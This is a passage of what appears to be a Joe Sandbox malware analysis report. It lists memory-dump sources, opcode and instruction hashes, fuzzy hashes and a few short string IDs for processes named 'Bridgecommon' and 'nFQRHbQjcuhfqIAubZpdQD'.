                                                                                              • Instruction Fuzzy Hash: 98F0D024F0D40E4AEBB4D758C8786B83352EFD0711F5543B5C40D972F5DD786A458640
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1986610362.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_7ffd9bad0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 56095de108985ef0d1b557f1b23a94601d3dbc44fd0f00b7b83b806b59c34ec8
                                                                                              • Instruction ID: 69be8b57e7d9f1c4728cf9c0cefee2d43330e2ad13ae5cd1229bd57d71113dcb
                                                                                              • Opcode Fuzzy Hash: 56095de108985ef0d1b557f1b23a94601d3dbc44fd0f00b7b83b806b59c34ec8
                                                                                              • Instruction Fuzzy Hash: B3F02270918A1C8FCF98DB48C495EE9B7F1FB68305F114199914AE7260CB31EA80CF85
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1986610362.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_7ffd9bad0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b4de9ccdc03301b4f8b34275fbf37b0f750ec48e4bf8e95f9c956194bf01efe9
                                                                                              • Instruction ID: 80f32f3af981112524dfa9caf3547bb5af2cc3d6dc48dfb79d6b70ebd687c03b
                                                                                              • Opcode Fuzzy Hash: b4de9ccdc03301b4f8b34275fbf37b0f750ec48e4bf8e95f9c956194bf01efe9
                                                                                              • Instruction Fuzzy Hash: 4DE01230F0D11A46FBB49754D8617F962B0EBD4300F1121B8D50E933D1DD78AF81CA49
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1986610362.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_7ffd9bad0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 4b40751a1cefa32304aed0fb67d836df1cb2b4d29e4b1e5402fa9057282fa0e8
                                                                                              • Instruction ID: ee4550b84af7779471804bd44f4eca39960630772f8e243641bbcc622fd8accc
                                                                                              • Opcode Fuzzy Hash: 4b40751a1cefa32304aed0fb67d836df1cb2b4d29e4b1e5402fa9057282fa0e8
                                                                                              • Instruction Fuzzy Hash: 21C04C05F5B51F01F43577EE54760ACB5409BD5A10FD70372D50D840E19CED22D5815E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1986610362.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_7ffd9bad0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 668c455a36bf044a3fc1981b792573f4f4189be78a65a753a26ab6c65c12f0f8
                                                                                              • Instruction ID: ea4277a05fc08a7e60f9c3051bcf18043e5bf4e6c8f2dac607c17467776c4421
                                                                                              • Opcode Fuzzy Hash: 668c455a36bf044a3fc1981b792573f4f4189be78a65a753a26ab6c65c12f0f8
                                                                                              • Instruction Fuzzy Hash: 0CC08C3051180C8FC908EB28C88480433A0FB09300BC20090E009C7270E259DDC2C740
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1986610362.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_7ffd9bad0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 73f9df46521dc5d9b38235658b75fdd496f8a23a7d2725a714683a5f0d8331b5
                                                                                              • Instruction ID: 0878ed8e344642cdfa69e7fdeaa9ca7b4371213ce7a24820e0fcb3aa192dbb57
                                                                                              • Opcode Fuzzy Hash: 73f9df46521dc5d9b38235658b75fdd496f8a23a7d2725a714683a5f0d8331b5
                                                                                              • Instruction Fuzzy Hash: E0C08CA1E1820945E33487A048391AE73818F80220F928772805DA60A5EE6856429680
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1986610362.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_7ffd9bad0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 32e7fbaf4abd05d9173681fc5712a29696d9faee7d498aecc04d894edf43d1e9
                                                                                              • Instruction ID: d0aef74e046fca9d5fff606be4ee067224dbd847e4fa52369125de9ac5e83069
                                                                                              • Opcode Fuzzy Hash: 32e7fbaf4abd05d9173681fc5712a29696d9faee7d498aecc04d894edf43d1e9
                                                                                              • Instruction Fuzzy Hash: 4DC08C00F1881E03F359630804301BE04838F8436CF4006B4E01E862DECC0C592106C7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1986610362.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_7ffd9bad0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 709359157962c98cd0ecdf05242bc1fd9eaca1de47418e54626fafadeef44463
                                                                                              • Instruction ID: a8191215b382f8a73f31a7feefe0008b463f6229fc6eb65d2ed8bfc4d80beb0f
                                                                                              • Opcode Fuzzy Hash: 709359157962c98cd0ecdf05242bc1fd9eaca1de47418e54626fafadeef44463
                                                                                              • Instruction Fuzzy Hash: E5B01200E5740F00E43433FB08660A870409BC4100FC20270D40D8009198DD12944246
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1986610362.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_7ffd9bad0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: c9$!k9$"s9$#{9
                                                                                              • API String ID: 0-1692736845
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000034.00000002.2287109869.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_52_2_7ffd9bab0000_nFQRHbQjcuhfqIAubZpdQD.jbxd
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000034.00000002.2287109869.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_52_2_7ffd9bab0000_nFQRHbQjcuhfqIAubZpdQD.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: c9$!k9$"s9$#{9
                                                                                              • API String ID: 0-1692736845
                                                                                              • Opcode ID: 64295ce63d89b9c75ab817259eb6315a6be831e1ddee33239c49bc918e967d57
                                                                                              • Instruction ID: ee0e26a1e1c57ffd8ab351f7d2016590dd2b112039a0fad7042e754bedb5fd9d
                                                                                              • Opcode Fuzzy Hash: 64295ce63d89b9c75ab817259eb6315a6be831e1ddee33239c49bc918e967d57
                                                                                              • Instruction Fuzzy Hash: DB41AE07B0953646E23973FD78229ED5B848FA927FB0847B7F56E8D0D74C486081C2E9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000035.00000002.2422491753.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_53_2_7ffd9baa0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: e298924558cdf75836356de80b6b6ce24da7b4dcdffe246a24136d95157e07a1
                                                                                              • Instruction ID: 3057145fd8dcbd557d3c9d4f11f4b30b69ef3ebf83dd91c1fd982a401da09fb4
                                                                                              • Opcode Fuzzy Hash: e298924558cdf75836356de80b6b6ce24da7b4dcdffe246a24136d95157e07a1
                                                                                              • Instruction Fuzzy Hash: AD910372A18A8E4FE799DB688865BA97FE1FF99310F0001BED04DD72DACBB41815C750
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000035.00000002.2422491753.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_53_2_7ffd9baa0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 596f4c78ed5f81c6e6c0533246ad394b3462272b50f7c3d4b4af88e82da2c9b8
                                                                                              • Instruction ID: ef5fbe12199d23f78f9465fe2103630e558dd08619b163c7e8fdabb94f322d64
                                                                                              • Opcode Fuzzy Hash: 596f4c78ed5f81c6e6c0533246ad394b3462272b50f7c3d4b4af88e82da2c9b8
                                                                                              • Instruction Fuzzy Hash: C231453130D9184FDB68EB5CE89A9B977D1EF8932131501BBE48AC7176DD11EC8287C1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000035.00000002.2422491753.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_53_2_7ffd9baa0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 6307cf6b14e928487153d3883c4b960fcffa29b4ffd1c21285bf3c0f290c55c1
                                                                                              • Instruction ID: fbafab121d8405f85b03db1101e74b647bf9427c5d853f3437fde4d1f8bfbc6b
                                                                                              • Opcode Fuzzy Hash: 6307cf6b14e928487153d3883c4b960fcffa29b4ffd1c21285bf3c0f290c55c1
                                                                                              • Instruction Fuzzy Hash: C9213621B19D1D0FE768B76C946AA79B6C7DF99321F0101B9E80EC32F6DC54AC414291
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000035.00000002.2422491753.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_53_2_7ffd9baa0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c0327eba3f906cc6467ce625444e40bd4178ac4196851a1cf31603b97a8fe9f2
                                                                                              • Instruction ID: dde9e36c2460550f6157f906213e23e4e3db1c2d4616664fd46a6bd53cc45487
                                                                                              • Opcode Fuzzy Hash: c0327eba3f906cc6467ce625444e40bd4178ac4196851a1cf31603b97a8fe9f2
                                                                                              • Instruction Fuzzy Hash: 0431B831A0954E8FDB95EB68C8649BD7BF1FF6A300F0545BBC049D72A2DE64A540CB50
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000035.00000002.2422491753.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_53_2_7ffd9baa0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 3335919d2c6e63ce75fdfda523993ec9479fbeb03512a89b05ca0514e28ced22
                                                                                              • Instruction ID: 5c6b92bafbd1c4b94b93d5554952fadbf8b7e4ac8ffa734e0b82fed98ef96cdb
                                                                                              • Opcode Fuzzy Hash: 3335919d2c6e63ce75fdfda523993ec9479fbeb03512a89b05ca0514e28ced22
                                                                                              • Instruction Fuzzy Hash: E1210736B0D24D4AE732ABA898610DC7B60EF81325F0546B3D05CCF1D3D968264AC7A5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000035.00000002.2422491753.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_53_2_7ffd9baa0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: ac3c9bc8c716dc504ffa429cf03ca426346652c33d75f25f0544f67aa458dc4e
                                                                                              • Instruction ID: f0344ae99497d8b3ce69669b44582ea662fd5eb530a836cb94debab1190c11b1
                                                                                              • Opcode Fuzzy Hash: ac3c9bc8c716dc504ffa429cf03ca426346652c33d75f25f0544f67aa458dc4e
                                                                                              • Instruction Fuzzy Hash: 47216221F0E90E5BEBB4E76884646B862D3EF95710F4642B5D00EC72F2EDA8AE41C754
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000035.00000002.2422491753.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_53_2_7ffd9baa0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 8ae14cd04305e3687a400c8ed58d5ec676d19df50722d29e2809d28cae50ff32
                                                                                              • Instruction ID: ee3e5238a3670d99645fcfcd6a25887a54f6e31eedcdb13f2403f581200cded0
                                                                                              • Opcode Fuzzy Hash: 8ae14cd04305e3687a400c8ed58d5ec676d19df50722d29e2809d28cae50ff32
                                                                                              • Instruction Fuzzy Hash: 9711A135A0E28D9FE722DFA8886019C7FB1EF42711F0645F7D048DB1A2D57466498764
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000035.00000002.2422491753.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_53_2_7ffd9baa0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: ff9ee0a9b2356f0109076b3f41e4a4fae50f0fa480aed1388e41d9444b705a9f
                                                                                              • Instruction ID: 47d7e5d13c262c3372b59d6d2ab8ae84b03f45a1263f12c989df84604a467376
                                                                                              • Opcode Fuzzy Hash: ff9ee0a9b2356f0109076b3f41e4a4fae50f0fa480aed1388e41d9444b705a9f
                                                                                              • Instruction Fuzzy Hash: BB019235A0E38D9FD722DFA4C86019CBFB1EF06710F1641E7D048DB1A2D57466458764
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000035.00000002.2422491753.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_53_2_7ffd9baa0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 6972e715cee46fea15727880a09f83d8bcc71e185d0e0b929535a71ec95cf017
                                                                                              • Instruction ID: cadb3b4ab4f03696c4086759dd291f18fb822f89a0bcbf4b23ce3b0d19e1d81d
                                                                                              • Opcode Fuzzy Hash: 6972e715cee46fea15727880a09f83d8bcc71e185d0e0b929535a71ec95cf017
                                                                                              • Instruction Fuzzy Hash: 0D018435E0E38D9FE721DFA488A059CBFB1EF06704F1541E7D048DB1A2D97867448755
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000035.00000002.2422491753.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_53_2_7ffd9baa0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 72ddf6cd64bb68537bc4cbeb0a6c4be090775de59c5f2517ea9ade3f85775b72
                                                                                              • Instruction ID: 3ec7cc7ba45723f7b4b8c421758896821619287a87029bf8238183eb5657f024
                                                                                              • Opcode Fuzzy Hash: 72ddf6cd64bb68537bc4cbeb0a6c4be090775de59c5f2517ea9ade3f85775b72
                                                                                              • Instruction Fuzzy Hash: D5F03134A4941F9AEBB4AB54C8647B87363FB51711F4542B9C00DD71E1DEB82A81CB50
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000035.00000002.2422491753.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_53_2_7ffd9baa0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: dd3852e97d2e0f820c2be246b407bfd78cf3776febf2094ebfa7a52b98e55e5b
                                                                                              • Instruction ID: 4f8a4f5c50763b6547e8d172721ab41427098affdc8fd07ba5e9582b00eaf5dd
                                                                                              • Opcode Fuzzy Hash: dd3852e97d2e0f820c2be246b407bfd78cf3776febf2094ebfa7a52b98e55e5b
                                                                                              • Instruction Fuzzy Hash: 18F0EC3571E649CFC7419B38DC959D47B60EB4721575614FAC045C7562C2105C6DCB54
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000035.00000002.2422491753.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_53_2_7ffd9baa0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: ab1761b7cbfcb63ef741ac2f93f71d9567e4b4ef76105488ec604dc97edba527
                                                                                              • Instruction ID: acd26d11f75ed7367a2f4595323d1b8409acbb3fe45f594cea6a882e8954b2fe
                                                                                              • Opcode Fuzzy Hash: ab1761b7cbfcb63ef741ac2f93f71d9567e4b4ef76105488ec604dc97edba527
                                                                                              • Instruction Fuzzy Hash: C1F03020F0D40E5AEAB4D758C8646B87353AF91711F5542B5C00DD72F1DE686A41C650
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000035.00000002.2422491753.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_53_2_7ffd9baa0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 37d07e7ae6d8f6376555ed24e4aea218d1763d440c633fcfcbe473bb0af43cde
                                                                                              • Instruction ID: 2520c6303cff0c44a2abdaff91efda22ee2ce56836b11e2904bdb1fb7a217d55
                                                                                              • Opcode Fuzzy Hash: 37d07e7ae6d8f6376555ed24e4aea218d1763d440c633fcfcbe473bb0af43cde
                                                                                              • Instruction Fuzzy Hash: 61F02270518A1C8FCF98DB08C495EE9B7F1FB68305F114599914AE7260CB31AA84CF85
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000035.00000002.2422491753.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_53_2_7ffd9baa0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b4de9ccdc03301b4f8b34275fbf37b0f750ec48e4bf8e95f9c956194bf01efe9
                                                                                              • Instruction ID: cfc2de5658930fd6e7e7228830e43d3a928dcda84767a8642b57e199a0e6af26
                                                                                              • Opcode Fuzzy Hash: b4de9ccdc03301b4f8b34275fbf37b0f750ec48e4bf8e95f9c956194bf01efe9
                                                                                              • Instruction Fuzzy Hash: E0E01230E0D11A46FBB49754D8617F9A3A2DB54300F1110B8D50E933E1DD78AF41CA59
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000035.00000002.2422491753.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_53_2_7ffd9baa0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 4b40751a1cefa32304aed0fb67d836df1cb2b4d29e4b1e5402fa9057282fa0e8
                                                                                              • Instruction ID: baf718ed88d573d000fd7f5ce1029a5dbb42e8b88a52bd10751493619a7a9558
                                                                                              • Opcode Fuzzy Hash: 4b40751a1cefa32304aed0fb67d836df1cb2b4d29e4b1e5402fa9057282fa0e8
                                                                                              • Instruction Fuzzy Hash: 68C04C05F5B51F01F47577EE54660ACB2425BD5F14FD70172D50D800E19CED22D9417E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000035.00000002.2422491753.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_53_2_7ffd9baa0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 668c455a36bf044a3fc1981b792573f4f4189be78a65a753a26ab6c65c12f0f8
                                                                                              • Instruction ID: d13446063b84285c10a692fc5e2f5a9d38e874d28bcbd09c94f111251576bc1a
                                                                                              • Opcode Fuzzy Hash: 668c455a36bf044a3fc1981b792573f4f4189be78a65a753a26ab6c65c12f0f8
                                                                                              • Instruction Fuzzy Hash: F1C08C3051180C8FC948EB28C88481833E0FB09300BC20090E009C7270E259EDC2C740
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000035.00000002.2422491753.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_53_2_7ffd9baa0000_Bridgecommon.jbxd
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000035.00000002.2422491753.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_53_2_7ffd9baa0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: c9$!k9$"s9$#{9
                                                                                              • API String ID: 0-1692736845
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000036.00000002.2624133627.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_54_2_7ffd9bac0000_nFQRHbQjcuhfqIAubZpdQD.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 73f9df46521dc5d9b38235658b75fdd496f8a23a7d2725a714683a5f0d8331b5
                                                                                              • Instruction ID: db5b3f207a421dc53e70be9b731f65d61f488f42ebffb6c514a6dd16de34bfda
                                                                                              • Opcode Fuzzy Hash: 73f9df46521dc5d9b38235658b75fdd496f8a23a7d2725a714683a5f0d8331b5
                                                                                              • Instruction Fuzzy Hash: 07C08CA1E1820945E734A7A048291BA73818F00220F628672805EA70A2EE6856026680
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000036.00000002.2624133627.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_54_2_7ffd9bac0000_nFQRHbQjcuhfqIAubZpdQD.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b37f417694fa82bfb45a749df6edb8683e53e25f9ad118d5d1aaf04b8164b456
                                                                                              • Instruction ID: 19fa962a5ec4e235b4f84a3133a04002eefd38457f2a4de96f83154f0d1b0b83
                                                                                              • Opcode Fuzzy Hash: b37f417694fa82bfb45a749df6edb8683e53e25f9ad118d5d1aaf04b8164b456
                                                                                              • Instruction Fuzzy Hash: EBC04C01F1881E07F359671444315BE04835F54768F6546B4E01E976DECD4C592107C7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000036.00000002.2624133627.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_54_2_7ffd9bac0000_nFQRHbQjcuhfqIAubZpdQD.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 709359157962c98cd0ecdf05242bc1fd9eaca1de47418e54626fafadeef44463
                                                                                              • Instruction ID: ab030b86c4bcf3b1657126a11f365bd75a6e5d39b1a09ea4130e55803ddecb7e
                                                                                              • Opcode Fuzzy Hash: 709359157962c98cd0ecdf05242bc1fd9eaca1de47418e54626fafadeef44463
                                                                                              • Instruction Fuzzy Hash: CBB01200E5740F00E83433FB18520B870405B44100FC20170D40D8109198DE1294024A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000036.00000002.2624133627.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_54_2_7ffd9bac0000_nFQRHbQjcuhfqIAubZpdQD.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: c9$!k9$"s9$#{9
                                                                                              • API String ID: 0-1692736845
                                                                                              • Opcode ID: 0c3b06beb0677065432428f0b9d6bcea3016760cb5bde0b927d35fb793fcb833
                                                                                              • Instruction ID: 943e67d24a289ae94424641f4274a367810d43296ff82d20f4cccdf8297165db
                                                                                              • Opcode Fuzzy Hash: 0c3b06beb0677065432428f0b9d6bcea3016760cb5bde0b927d35fb793fcb833
                                                                                              • Instruction Fuzzy Hash: 79415E07B0946A45E32977FD78219FD6B448FA923FB0843B7F85E8D0D74C486081C2E9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000037.00000002.2778709297.00007FFD9BAE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_55_2_7ffd9bae0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: eace6fd7884b5202b99ffa1cc342309f039be07fa55fbe9d00f346ee9287782f
                                                                                              • Instruction ID: 638a291d7505c94ad125764ad5c81229d25cea754d02e3121c80007e10c86ff9
                                                                                              • Opcode Fuzzy Hash: eace6fd7884b5202b99ffa1cc342309f039be07fa55fbe9d00f346ee9287782f
                                                                                              • Instruction Fuzzy Hash: E3C2C531B1991E4FEBA8EB5884A1AB87392FFA8350F0542B9D01DC72D7DD78BD418781
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000037.00000002.2778709297.00007FFD9BB01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB01000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_55_2_7ffd9bb01000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 5d06b3dd888a6dcf83fbd24a10f4f31b7238f132e43f3122bb876512fb24da28
                                                                                              • Instruction ID: 29a257cdb54c29e488bb56fda270c9e157672a6cdd1fd31da85554e854ce2be3
                                                                                              • Opcode Fuzzy Hash: 5d06b3dd888a6dcf83fbd24a10f4f31b7238f132e43f3122bb876512fb24da28
                                                                                              • Instruction Fuzzy Hash: A9B17C21B6D79A0BE32D8A6C48920B573C1FB9330DB15877DE8DBC359BD928E50786C1
                                                                                              Memory Dump Source
